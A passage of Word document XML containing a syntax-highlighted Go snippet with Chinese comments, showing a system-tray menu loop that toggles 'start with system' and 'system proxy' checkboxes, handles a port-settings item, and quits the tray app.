          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>部分的代码简洁美观，此处定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> toggle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>为一个匿名函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>此处设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>勾选框为勾选或者取消勾选、菜单隐藏或显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>【执行部分】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>如果删除此处的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，所有动作将执行第一个动作，其他动作之后则不执行，即便点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>也无济于事</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ClickedCh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>意思是，点击的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>出来的事件，来触发对应动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-mStartOnWithSystem.ClickedCh:</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>开机启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mStartOnWithSystem.Checked() {</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t>mStartOnWithSystem.Uncheck()</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t xml:space="preserve">} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</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t>mStartOnWithSystem.Check()</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t>}</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-mSystemProxy.ClickedCh:</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>系统代理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mSystemProxy.Checked() {</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t>mSystemProxy.Uncheck()</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t xml:space="preserve">} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</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t>mSystemProxy.Check()</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t>}</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-mPort.ClickedCh:</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>端口设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-mQuit.ClickedCh:</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t>systray.Quit()</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r>
